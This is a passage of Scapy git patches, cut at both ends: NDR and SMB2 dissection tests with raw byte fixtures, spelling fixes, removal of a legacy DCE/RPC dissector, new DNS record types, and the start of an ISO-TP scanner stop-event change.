b'\x04\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00' = DCE/RPC payload length computation -bytes(DceRpc4() / b'\x00\x01\x02\x03') == hex_bytes('04000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000ffffffff00040000000000010203') +assert bytes(DceRpc4() / b'\x00\x01\x02\x03') == b'\x04\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x04\x00\x00\x00\x00\x00\x00\x01\x02\x03' = DCE/RPC Guess payload class fallback with no possible payload p = DceRpc(hex_bytes('04000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000ffffffff00040000000000010203')) @@ -117,3 +156,204 @@ bytes(DceRpc4(ptype='response', endian='little', opnum=3) / b'\x00\x01\x02\x03') = DCE/RPC little-endian dissection p = DceRpc(hex_bytes('04020000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000300ffffffff04000000000000010203')) p.ptype == 2 and p.opnum == 3 and p.len == 4 + ++ NDR tests + += Create NDR Packet + +# from [MS-SRVS] +class LPSHARE_INFO_1(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullPointerField( + NDRConfVarStrNullFieldUtf16("shi1_netname", ""), + ), + NDRIntField("shi1_type", 0), + NDRFullPointerField( + NDRConfVarStrNullFieldUtf16("shi1_remark", ""), + ), + ] + += Check user friendliness + +pkt = LPSHARE_INFO_1(shi1_netname=b"ADMIN1$") +val = pkt.fields['shi1_netname'] +assert isinstance(val, NDRPointer) +assert isinstance(val.value, NDRConformantArray) +assert isinstance(val.value.value[0], NDRVaryingArray) +assert val.value.value[0].value == b"ADMIN1$" + += Try building it + +assert bytes(pkt) == b'\x00\x00\x02\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00A\x00D\x00M\x00I\x00N\x001\x00$\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += Re-dissect +z = LPSHARE_INFO_1(bytes(pkt)) +val = z.fields['shi1_netname'] +assert val.value.max_count == 8 +assert val.value.value[0].actual_count == 8 +assert val.value.value[0].value == b"ADMIN1$" + += Same thing with NDR32 + +pkt = LPSHARE_INFO_1(shi1_netname=b"ADMIN1$", ndr64=False) +assert bytes(pkt) == b'\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00A\x00D\x00M\x00I\x00N\x001\x00$\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + +z = LPSHARE_INFO_1(bytes(pkt), ndr64=False) +val = z.fields['shi1_netname'] +assert val.value.max_count == 8 +assert val.value.value[0].actual_count == 8 +assert val.value.value[0].value == b"ADMIN1$" + ++ Real tests on complex packets + += Define structs + +# From [MS-WKST] + +class LPWKSTA_USER_INFO_0(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullPointerField( + NDRConfVarStrNullFieldUtf16("wkui0_username", ""), deferred=True + ) + ] + + +class LPWKSTA_USER_INFO_0_CONTAINER(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("EntriesRead", 0), + NDRFullPointerField( + NDRConfPacketListField( + "Buffer", + [LPWKSTA_USER_INFO_0()], + LPWKSTA_USER_INFO_0, + count_from=lambda pkt: pkt.EntriesRead, + ), + deferred=True, + ), + ] + + +class LPWKSTA_USER_INFO_1(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullPointerField( + NDRConfVarStrNullFieldUtf16("wkui1_username", ""), deferred=True + ), + NDRFullPointerField( + NDRConfVarStrNullFieldUtf16("wkui1_logon_domain", ""), deferred=True + ), + NDRFullPointerField( + NDRConfVarStrNullFieldUtf16("wkui1_oth_domains", ""), deferred=True + ), + NDRFullPointerField( + NDRConfVarStrNullFieldUtf16("wkui1_logon_server", ""), deferred=True + ), + ] + + +class LPWKSTA_USER_INFO_1_CONTAINER(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("EntriesRead", 0), + NDRFullPointerField( + NDRConfPacketListField( + "Buffer", + [LPWKSTA_USER_INFO_1()], + LPWKSTA_USER_INFO_1, + count_from=lambda pkt: pkt.EntriesRead, + ), + deferred=True, + ), + ] + + +class LPWKSTA_USER_ENUM_STRUCT(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("Level", 0), + NDRUnionField( + [ + ( + NDRFullPointerField( + NDRPacketField( + "WkstaUserInfo", + LPWKSTA_USER_INFO_0_CONTAINER(), + LPWKSTA_USER_INFO_0_CONTAINER, + ), + deferred=True, + ), + ( + (lambda pkt: getattr(pkt, "Level", None) == 0), + (lambda _, val: val.tag == 0), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "WkstaUserInfo", + LPWKSTA_USER_INFO_1_CONTAINER(), + LPWKSTA_USER_INFO_1_CONTAINER, + ), + deferred=True, + ), + ( + (lambda pkt: getattr(pkt, "Level", None) == 1), + (lambda _, val: val.tag == 1), + ), + ), + ], + StrFixedLenField("WkstaUserInfo", "", length=0), + align=(4, 8), + ), + ] + + +class NetrWkstaUserEnum_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", "")), + NDRPacketField( + "UserInfo", LPWKSTA_USER_ENUM_STRUCT(), LPWKSTA_USER_ENUM_STRUCT + ), + NDRIntField("PreferredMaximumLength", 0), + NDRFullPointerField(NDRIntField("ResumeHandle", 0)), + ] + + +class NetrWkstaUserEnum_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "UserInfo", LPWKSTA_USER_ENUM_STRUCT(), LPWKSTA_USER_ENUM_STRUCT + ), + NDRIntField("TotalEntries", 0), + NDRFullPointerField(NDRIntField("ResumeHandle", 0)), + NDRIntField("status", 0), + ] + += Build test + +pkt = NetrWkstaUserEnum_Request( + ServerName="test", + UserInfo=LPWKSTA_USER_ENUM_STRUCT( + WkstaUserInfo=NDRUnion( + tag=0, + value=LPWKSTA_USER_INFO_0_CONTAINER( + EntriesRead=1, + Buffer=[ + LPWKSTA_USER_INFO_0(wkui0_username="test") + ] + ) + ) + ) +) + +assert bytes(pkt) == b'\x00\x00\x02\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00t\x00e\x00s\x00t\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00t\x00e\x00s\x00t\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += Dissect test + +pkt = NetrWkstaUserEnum_Request(bytes(pkt)) +pkt.ServerName +assert pkt.ServerName.value.value[0].value == b"test" +assert pkt.UserInfo.WkstaUserInfo.value.value.Buffer.value.value[0].wkui0_username.value.value[0].value == b"test" diff --git a/test/scapy/layers/smb2.uts b/test/scapy/layers/smb2.uts index 894f9edb128..0a9cae189af 100644 --- a/test/scapy/layers/smb2.uts +++ b/test/scapy/layers/smb2.uts @@ -385,7 +385,7 @@ assert ioctl_req.CtlCode == 1311236 assert ioctl_req.InputBufferOffset == 120 assert ioctl_req.InputLen == 34 validate_neg = ioctl_req.Buffer[0][1] -assert isinstance(validate_neg, SMB2_IOCTL_Validate_Negotiate_Info) +assert isinstance(validate_neg, SMB2_IOCTL_Validate_Negotiate_Info_Request) assert validate_neg.SecurityMode.SMB2_NEGOTIATE_SIGNING_ENABLED assert validate_neg.Dialects == [514, 528, 768, 770, 785] @@ -396,3 +396,18 @@ c = Ether(raw(c)) assert c.InputBufferOffset == 120 assert c.InputLen == 34 assert len(c.Buffer[0][1]) == 34 + += SMB2 Create Request with Contexts + +sess_create_context = NBTSession(b'\x00\x00\x01D\xfeSMB@\x00\x01\x00\x00\x00\x00\x00\x05\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x80\xcd\t\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x9bk>\xb6[=\x16\xb4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x009\x00\x00\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\x00\x12\x00\x00\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00d\x00\x00\x00x\x00\x16\x00\x90\x00\x00\x00\xb4\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00\x00\x008\x00\x00\x00\x10\x00\x04\x00\x00\x00\x18\x00 \x00\x00\x00DH2Q\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x1d\xb3\xc8\xfa\r\xed\x11\xb7R\x808\xfb\xd6\xa0~\x18\x00\x00\x00\x10\x00\x04\x00\x00\x00\x18\x00\x00\x00\x00\x00MxAc\x00\x00\x00\x00\x18\x00\x00\x00\x10\x00\x04\x00\x00\x00\x18\x00\x00\x00\x00\x00QFid\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x04\x00\x00\x00\x18\x004\x00\x00\x00RqLs\x00\x00\x00\x00\xc8\x9bA\xdb\x8e\xd1\x19\xf4\\;\x846;\xf6\xca\xe0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +assert sess_create_context.Name == "desktop.ini" +assert isinstance(sess_create_context.CreateContexts[0].Data, SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2) +assert sess_create_context.CreateContexts[1].Name == b"MxAc" +assert sess_create_context.CreateContexts[2].Name == b"QFid" +assert isinstance(sess_create_context.CreateContexts[3].Data, SMB2_CREATE_REQUEST_LEASE_V2) + +sess_create_context_response = NBTSession(b"\x00\x00\x00\xf0\xfeSMB@\x00\x01\x00\x00\x00\x00\x00\x05\x00\x01\x001\x00\x00\x00\x00\x00\x00\x00\x7f\xcd\t\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x9bk>\xb6[=\x16\xb4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00Y\x00\x00\x00\x01\x00\x00\x00\x9d\x89JH\xbe\xa1\xd8\x01\x9d\x89JH\xbe\xa1\xd8\x01{\x0f$W\x06\xa2\xd8\x01{\x0f$W\x06\xa2\xd8\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x13\x17\xe8L\x00\x00\x00\x00'\x1aT\xad\x00\x00\x00\x00\x98\x00\x00\x00X\x00\x00\x00 \x00\x00\x00\x10\x00\x04\x00\x00\x00\x18\x00\x08\x00\x00\x00MxAc\x00\x00\x00\x00\x00\x00\x00\x00\xff\x01\x1f\x00\x00\x00\x00\x00\x10\x00\x04\x00\x00\x00\x18\x00 \x00\x00\x00QFid\x00\x00\x00\x00\x01\x00$\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") +assert sess_create_context_response.CreateContexts[0].Data.QueryStatus == 0 +assert sess_create_context_response.CreateContexts[1].Data.DiskFileId == 2359297 +assert sess_create_context_response.CreateContexts[1].Data.Reserved == b'\x00' * 16 + From 2001f35c7a9762d2d58f5ec402d93d10bbfd8e10 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 18 Aug 2022 09:46:42 +0200 Subject: [PATCH 0868/1632] Fix spellcheck --- .config/codespell_ignore.txt | 2 ++ scapy/arch/windows/__init__.py | 2 +- scapy/contrib/concox.py | 2 +- scapy/contrib/lldp.py | 2 +- scapy/contrib/opc_da.py | 2 +- scapy/layers/inet.py | 14 +++++++------- scapy/layers/tls/extensions.py | 2 +- scapy/layers/tls/handshake.py | 12 ++++++------ test/contrib/automotive/gm/gmlanutils.uts | 2 +- test/random.uts | 22 +++++++++++----------- 10 files changed, 32 insertions(+), 30 deletions(-) diff --git a/.config/codespell_ignore.txt b/.config/codespell_ignore.txt index 11e65cb392f..fe284a77e4a 100644 --- a/.config/codespell_ignore.txt +++ b/.config/codespell_ignore.txt @@ -22,7 +22,9 @@ negociate ot potatoe referer +ro ser +singl te tim ue diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index 2e6aad9fcce..9d0b057d52a 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -833,7 +833,7 @@ def _append_route6(routes, dpref, dp, nh, iface, lifaddr, metric): cset = construct_source_candidate_set(dpref, dp, devaddrs) if not cset: return - # APPEND (DESTINATION, NETMASK, NEXT HOP, IFACE, CANDIDATS, METRIC) + # APPEND (DESTINATION, NETMASK, NEXT HOP, IFACE, CANDIDATES, METRIC) routes.append((dpref, dp, nh, iface, cset, metric)) diff --git a/scapy/contrib/concox.py b/scapy/contrib/concox.py index c7ca01301f9..c4d87b219f4 100644 --- a/scapy/contrib/concox.py +++ b/scapy/contrib/concox.py @@ -223,7 +223,7 @@ class CRX1NewPacketContent(Packet): "", length_from=lambda pkt: pkt.command_length - 4), lambda pkt: len(pkt.original) > 5 and pkt.protocol_number in (0x80, 0x15)), - # Commun + # Common ConditionalField( ByteEnumField( "alarm_extended", 0x00, { diff --git a/scapy/contrib/lldp.py b/scapy/contrib/lldp.py index e1bb8932f79..9888f283f70 100644 --- a/scapy/contrib/lldp.py +++ b/scapy/contrib/lldp.py @@ -256,7 +256,7 @@ def dissection_done(self, pkt): super(LLDPDU, self).dissection_done(pkt) def _check(self): - """Overwrited by LLDPU objects""" + """Overwritten by LLDPU objects""" pass def post_dissect(self, s): diff --git a/scapy/contrib/opc_da.py b/scapy/contrib/opc_da.py index ec6365580ff..49bb3dec63a 100644 --- a/scapy/contrib/opc_da.py +++ b/scapy/contrib/opc_da.py @@ -762,7 +762,7 @@ def extract_padding(self, p): # The fault PDU is used to indicate either an RPC run-time, RPC stub, or # RPC-specific exception to the client. -# Length of the stubdata egal allochint less header +# Length of the stubdata equal allochint less header class OpcDaFault(Packet): # DCE 1.1 RPC - 12.6.4.7 name = "OpcDaFault" diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index c1eeec8e2d2..159b17aa90a 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -1197,20 +1197,20 @@ def _defrag_list(lst, defrag, missfrag): del p[conf.padding_layer].underlayer.payload ip = p[IP] if ip.len is None or ip.ihl is None: - clen = len(ip.payload) + c_len = len(ip.payload) else: - clen = ip.len - (ip.ihl << 2) + c_len = ip.len - (ip.ihl << 2) txt = conf.raw_layer() for q in lst[1:]: - if clen != q.frag << 3: # Wrong fragmentation offset - if clen > q.frag << 3: - warning("Fragment overlap (%i > %i) %r || %r || %r" % (clen, q.frag << 3, p, txt, q)) # noqa: E501 + if c_len != q.frag << 3: # Wrong fragmentation offset + if c_len > q.frag << 3: + warning("Fragment overlap (%i > %i) %r || %r || %r" % (c_len, q.frag << 3, p, txt, q)) # noqa: E501 missfrag.extend(lst) break if q[IP].len is None or q[IP].ihl is None: - clen += len(q[IP].payload) + c_len += len(q[IP].payload) else: - clen += q[IP].len - (q[IP].ihl << 2) + c_len += q[IP].len - (q[IP].ihl << 2) if conf.padding_layer in q: del q[conf.padding_layer].underlayer.payload txt.add_payload(q[IP].payload.copy()) diff --git a/scapy/layers/tls/extensions.py b/scapy/layers/tls/extensions.py index 316d22aeb80..112bdd5670a 100644 --- a/scapy/layers/tls/extensions.py +++ b/scapy/layers/tls/extensions.py @@ -420,7 +420,7 @@ class TLS_Ext_ServerCertType(TLS_Ext_Unknown): # RFC 5081 def _TLS_Ext_CertTypeDispatcher(m, *args, **kargs): """ We need to select the correct one on dissection. We use the length for - that, as 1 for client version would emply an empty list. + that, as 1 for client version would imply an empty list. """ tmp_len = struct.unpack("!H", m[2:4])[0] if tmp_len == 1: diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 02f1078af00..7ef4956ab16 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -857,9 +857,9 @@ def getfield(self, pkt, s): if tmp_len is not None: m, ret = s[:tmp_len], s[tmp_len:] while m: - clen = struct.unpack("!I", b'\x00' + m[:3])[0] - lst.append((clen, Cert(m[3:3 + clen]))) - m = m[3 + clen:] + c_len = struct.unpack("!I", b'\x00' + m[:3])[0] + lst.append((c_len, Cert(m[3:3 + c_len]))) + m = m[3 + c_len:] return m + ret, lst def i2m(self, pkt, i): @@ -902,9 +902,9 @@ def getfield(self, pkt, s): m = s if tmp_len is not None: m, ret = s[:tmp_len], s[tmp_len:] - clen = struct.unpack("!I", b'\x00' + m[:3])[0] - len_cert = (clen, Cert(m[3:3 + clen])) - m = m[3 + clen:] + c_len = struct.unpack("!I", b'\x00' + m[:3])[0] + len_cert = (c_len, Cert(m[3:3 + c_len])) + m = m[3 + c_len:] return m + ret, len_cert def i2m(self, pkt, i): diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 7a49273788a..0d489f6fb43 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -900,7 +900,7 @@ thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True -###### negative respone +###### negative response = timeout DisableNormalCommunication ecusimSuccessfullyExecuted = True started = threading.Event() diff --git a/test/random.uts b/test/random.uts index ad5d7076c61..7a445d2326e 100644 --- a/test/random.uts +++ b/test/random.uts @@ -41,20 +41,20 @@ assert rm.command() == "RandMAC(template='00:01:02:03:04:0-7')" = RandOID random.seed(0x2807) -ro = RandOID() -assert ro == "7.222.44.194.276.116.320.6.84.97.31.5.25.20.13.84.104.18" -assert ro.command() == "RandOID()" +rand_obj = RandOID() +assert rand_obj == "7.222.44.194.276.116.320.6.84.97.31.5.25.20.13.84.104.18" +assert rand_obj.command() == "RandOID()" -ro = RandOID("1.2.3.*") -assert ro == "1.2.3.41" -assert ro.command() == "RandOID(fmt='1.2.3.*')" +rand_obj = RandOID("1.2.3.*") +assert rand_obj == "1.2.3.41" +assert rand_obj.command() == "RandOID(fmt='1.2.3.*')" -ro = RandOID("1.2.3.0-28") -assert ro == ("1.2.3.11" if six.PY2 else "1.2.3.12") -assert ro.command() == "RandOID(fmt='1.2.3.0-28')" +rand_obj = RandOID("1.2.3.0-28") +assert rand_obj == ("1.2.3.11" if six.PY2 else "1.2.3.12") +assert rand_obj.command() == "RandOID(fmt='1.2.3.0-28')" -ro = RandOID("1.2.3.0-28", depth=RandNumExpo(0.2), idnum=RandNumExpo(0.02)) -assert ro.command() == "RandOID(fmt='1.2.3.0-28', depth=RandNumExpo(lambd=0.2), idnum=RandNumExpo(lambd=0.02))" +rand_obj = RandOID("1.2.3.0-28", depth=RandNumExpo(0.2), idnum=RandNumExpo(0.02)) +assert rand_obj.command() == "RandOID(fmt='1.2.3.0-28', depth=RandNumExpo(lambd=0.2), idnum=RandNumExpo(lambd=0.02))" = RandRegExp ~ not_pyannotate From 2b22448f5af902b4b712ba9436756405e74165c3 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 18 Aug 2022 16:07:58 -0700 Subject: [PATCH 0869/1632] Remove legacy file --- scapy/contrib/dce_rpc.py | 161 --------------------------------------- 1 file changed, 161 deletions(-) delete mode 100644 scapy/contrib/dce_rpc.py diff --git a/scapy/contrib/dce_rpc.py b/scapy/contrib/dce_rpc.py deleted file mode 100644 index a96b28364e9..00000000000 --- a/scapy/contrib/dce_rpc.py +++ /dev/null @@ -1,161 +0,0 @@ -# SPDX-License-Identifier: GPL-2.0-or-later -# This file is part of Scapy -# See https://scapy.net/ for more information -# Copyright (C) 2016 Gauthier Sebaux - -# scapy.contrib.description = DCE/RPC -# scapy.contrib.status = loads - -""" -A basic dissector for DCE/RPC. -Isn't reliable for all packets and for building -""" - -import struct - -from scapy.packet import Packet, Raw, bind_layers -from scapy.fields import ( - BitEnumField, - ByteEnumField, - ByteField, - FlagsField, - IntField, - LenField, - ShortField, - UUIDField, - XByteField, - XShortField, -) - - -# Fields -class EndiannessField(object): - """Field which change the endianness of a sub-field""" - __slots__ = ["fld", "endianess_from"] - - def __init__(self, fld, endianess_from): - self.fld = fld - self.endianess_from = endianess_from - - def set_endianess(self, pkt): - """Add the endianness to the format""" - end = self.endianess_from(pkt) - if isinstance(end, str) and end: - if isinstance(self.fld, UUIDField): - self.fld.uuid_fmt = (UUIDField.FORMAT_LE if end == '<' - else UUIDField.FORMAT_BE) - else: - # fld.fmt should always start with a order specifier, cf field - # init - self.fld.fmt = end[0] + self.fld.fmt[1:] - self.fld.struct = struct.Struct(self.fld.fmt) - - def getfield(self, pkt, buf): - """retrieve the field with endianness""" - self.set_endianess(pkt) - return self.fld.getfield(pkt, buf) - - def addfield(self, pkt, buf, val): - """add the field with endianness to the buffer""" - self.set_endianess(pkt) - return self.fld.addfield(pkt, buf, val) - - def __getattr__(self, attr): - return getattr(self.fld, attr) - - -# DCE/RPC Packet -DCE_RPC_TYPE = ["request", "ping", "response", "fault", "working", "no_call", - "reject", "acknowledge", "connectionless_cancel", "frag_ack", - "cancel_ack"] -DCE_RPC_FLAGS1 = ["reserved_0", "last_frag", "frag", "no_frag_ack", "maybe", - "idempotent", "broadcast", "reserved_7"] -DCE_RPC_FLAGS2 = ["reserved_0", "cancel_pending", "reserved_2", "reserved_3", - "reserved_4", "reserved_5", "reserved_6", "reserved_7"] - - -def dce_rpc_endianess(pkt): - """Determine the right endianness sign for a given DCE/RPC packet""" - if pkt.endianness == 0: # big endian - return ">" - elif pkt.endianness == 1: # little endian - return "<" - else: - return "!" - - -class DceRpc(Packet): - """DCE/RPC packet""" - name = "DCE/RPC" - fields_desc = [ - ByteField("version", 4), - ByteEnumField("type", 0, DCE_RPC_TYPE), - FlagsField("flags1", 0, 8, DCE_RPC_FLAGS1), - FlagsField("flags2", 0, 8, DCE_RPC_FLAGS2), - BitEnumField("endianness", 0, 4, ["big", "little"]), - BitEnumField("encoding", 0, 4, ["ASCII", "EBCDIC"]), - ByteEnumField("float", 0, ["IEEE", "VAX", "CRAY", "IBM"]), - ByteField("DataRepr_reserved", 0), - XByteField("serial_high", 0), - EndiannessField(UUIDField("object_uuid", None), - endianess_from=dce_rpc_endianess), - EndiannessField(UUIDField("interface_uuid", None), - endianess_from=dce_rpc_endianess), - EndiannessField(UUIDField("activity", None), - endianess_from=dce_rpc_endianess), - EndiannessField(IntField("boot_time", 0), - endianess_from=dce_rpc_endianess), - EndiannessField(IntField("interface_version", 1), - endianess_from=dce_rpc_endianess), - EndiannessField(IntField("sequence_num", 0), - endianess_from=dce_rpc_endianess), - EndiannessField(ShortField("opnum", 0), - endianess_from=dce_rpc_endianess), - EndiannessField(XShortField("interface_hint", 0xffff), - endianess_from=dce_rpc_endianess), - EndiannessField(XShortField("activity_hint", 0xffff), - endianess_from=dce_rpc_endianess), - EndiannessField(LenField("frag_len", None, fmt="H"), - endianess_from=dce_rpc_endianess), - EndiannessField(ShortField("frag_num", 0), - endianess_from=dce_rpc_endianess), - ByteEnumField("auth", 0, ["none"]), # TODO other auth ? - XByteField("serial_low", 0), - ] - - -# Heuristically way to find the payload class -# -# To add a possible payload to a DCE/RPC packet, one must first create the -# packet class, then instead of binding layers using bind_layers, he must -# call DceRpcPayload.register_possible_payload() with the payload class as -# parameter. -# -# To be able to decide if the payload class is capable of handling the rest of -# the dissection, the classmethod can_handle() should be implemented in the -# payload class. This method is given the rest of the string to dissect as -# first argument, and the DceRpc packet instance as second argument. Based on -# this information, the method must return True if the class is capable of -# handling the dissection, False otherwise -class DceRpcPayload(Packet): - """Dummy class which use the dispatch_hook to find the payload class""" - _payload_class = [] - - @classmethod - def dispatch_hook(cls, _pkt, _underlayer=None, *args, **kargs): - """dispatch_hook to choose among different registered payloads""" - for klass in cls._payload_class: - if hasattr(klass, "can_handle") and \ - klass.can_handle(_pkt, _underlayer): - return klass - print("DCE/RPC payload class not found or undefined (using Raw)") - return Raw - - @classmethod - def register_possible_payload(cls, pay): - """Method to call from possible DCE/RPC endpoint to register it as - possible payload""" - cls._payload_class.append(pay) - - -bind_layers(DceRpc, DceRpcPayload) From e8dacc482db11ceb43c826ba944ab05ca5677877 Mon Sep 17 00:00:00 2001 From: Ko- Date: Wed, 27 Jul 2022 22:08:53 +0200 Subject: [PATCH 0870/1632] Add new DNS resource record types --- scapy/layers/dns.py | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) mode change 100755 => 100644 scapy/layers/dns.py diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py old mode 100755 new mode 100644 index 30bb85cae11..2c7718cef59 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -55,10 +55,11 @@ 45: "IPSECKEY", 46: "RRSIG", 47: "NSEC", 48: "DNSKEY", 49: "DHCID", 50: "NSEC3", 51: "NSEC3PARAM", 52: "TLSA", 53: "SMIMEA", 55: "HIP", 56: "NINFO", 57: "RKEY", 58: "TALINK", 59: "CDS", 60: "CDNSKEY", - 61: "OPENPGPKEY", 62: "CSYNC", 99: "SPF", 100: "UINFO", 101: "UID", - 102: "GID", 103: "UNSPEC", 104: "NID", 105: "L32", 106: "L64", 107: "LP", - 108: "EUI48", 109: "EUI64", 249: "TKEY", 250: "TSIG", 256: "URI", - 257: "CAA", 258: "AVC", 32768: "TA", 32769: "DLV", 65535: "RESERVED" + 61: "OPENPGPKEY", 62: "CSYNC", 63: "ZONEMD", 64: "SVCB", 65: "HTTPS", + 99: "SPF", 100: "UINFO", 101: "UID", 102: "GID", 103: "UNSPEC", 104: "NID", + 105: "L32", 106: "L64", 107: "LP", 108: "EUI48", 109: "EUI64", 249: "TKEY", + 250: "TSIG", 256: "URI", 257: "CAA", 258: "AVC", 259: "DOA", + 260: "AMTRELAY", 32768: "TA", 32769: "DLV", 65535: "RESERVED" } From 75269fc86ac271a54b0d2290dca01cf11b83b8a7 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 18 Aug 2022 09:37:39 +0200 Subject: [PATCH 0871/1632] Add stop event to isotp scanner to trigger async stop --- .config/mypy/mypy_enabled.txt | 3 ++ scapy/contrib/isotp/__init__.py | 1 + scapy/contrib/isotp/isotp_scanner.py | 43 ++++++++++++++++++++------ scapy/contrib/isotp/isotp_utils.py | 4 --- scapy/tools/automotive/isotpscanner.py | 23 +++++++++----- test/contrib/isotpscan.uts | 4 --- 6 files changed, 53 insertions(+), 25 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index b1cdbc03923..8ef430f0136 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -85,3 +85,6 @@ scapy/contrib/tcpao.py # TEST test/testsocket.py + +# TOOLS +scapy/tools/automotive/isotpscanner.py diff --git a/scapy/contrib/isotp/__init__.py b/scapy/contrib/isotp/__init__.py index e13462bd2a4..7fb0f8b8f51 100644 --- a/scapy/contrib/isotp/__init__.py +++ b/scapy/contrib/isotp/__init__.py @@ -28,6 +28,7 @@ USE_CAN_ISOTP_KERNEL_MODULE = False log_isotp = logging.getLogger("scapy.contrib.isotp") +log_isotp.setLevel(logging.INFO) if six.PY3 and LINUX: try: diff --git a/scapy/contrib/isotp/isotp_scanner.py b/scapy/contrib/isotp/isotp_scanner.py index e796fcc6e25..b46eb384dd0 100644 --- a/scapy/contrib/isotp/isotp_scanner.py +++ b/scapy/contrib/isotp/isotp_scanner.py @@ -9,6 +9,8 @@ import logging import time +from threading import Event + from scapy.compat import Iterable, Optional, Union, List, Tuple, Dict from scapy.packet import Packet from scapy.compat import orb @@ -17,7 +19,9 @@ from scapy.contrib.cansocket import PYTHON_CAN from scapy.contrib.isotp.isotp_packet import ISOTPHeader, ISOTPHeaderEA, \ ISOTP_FF, ISOTP -from scapy.contrib.isotp.isotp_utils import log_isotp + + +log_isotp = logging.getLogger("scapy.contrib.isotp") def send_multiple_ext(sock, ext_id, packet, number_of_packets): @@ -156,6 +160,7 